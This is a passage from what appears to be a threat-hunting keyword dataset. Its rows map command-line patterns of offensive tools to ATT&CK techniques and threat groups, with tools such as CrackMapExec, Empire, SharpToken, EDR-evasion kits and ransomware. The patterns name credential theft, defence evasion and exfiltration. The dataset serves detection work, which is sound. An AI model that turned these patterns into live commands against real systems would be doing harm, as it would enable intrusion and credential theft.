T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* empireadmin*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -enabled -u * -p * -old-bloodhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -encrypt * -process * -sandbox *,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,0,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z -* enip-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* enum 127.0.0.1 *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -* enum -passive -d *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* enum_avproducts*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* enum_chrome*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* enum_dns*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -Enumerate * -Module *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --enum-local-admins*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* epmd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* eppc-enum-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* EternalHushCore *,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -* etumbot.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* EtwHash*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,0,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z -* -eval *caplets.update* ui.update*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -* EventViewer-UACBypass*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,0,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -* evil.corp *,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -* EvilClippyManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -* evilginx*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,0,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -* EvilTwinServer *,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,0,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -* -ExchHostname * -Password *,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,0,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -* --excludedcs*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* exclusion.c /Fodefender.o*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,0,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -* -ExeArguments *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* exec * -p * -c *,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -* exec * --pid * --command *,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -* exec-command -clear*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -* exec-command -command *,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -* exec-command -shell*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -* -exec-shellcode *,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,0,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -* execute *NT AUTHORITY\SYSTEM*cmd /c *,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -* execute NT AUTHORITY\SYSTEM* cmd true bypass*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -* --execution false --save True --output *.bin*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,0,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -* exegol.apk*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* exegol.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* exe-selfdelete*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -* Exfil.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -* exfiltrate.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -* exiting (due to fatal error)*,greyware_tool_keyword,dns,Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -* Exrop(*/bin/*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,0,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -* extract --secrets --zsh*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,0,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z -* --extra-verbose*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -f *.bin -e AMSI*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -* -f *.bin -e Defender*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -* -f *.dmp windows.cmdline*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.dlllist --pid *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.filescan*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.handles --pid *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.info*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.malfind*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.netscan*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.netstat*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.pslist*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.psscan*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.pstree*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.registry.hivelist*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.registry.hivescan*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.registry.printkey*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.dmp windows.registry.printkey*Software\Microsoft\Windows\CurrentVersion*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -f *.exe --encrypt xor --jmp -o *.exe*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense 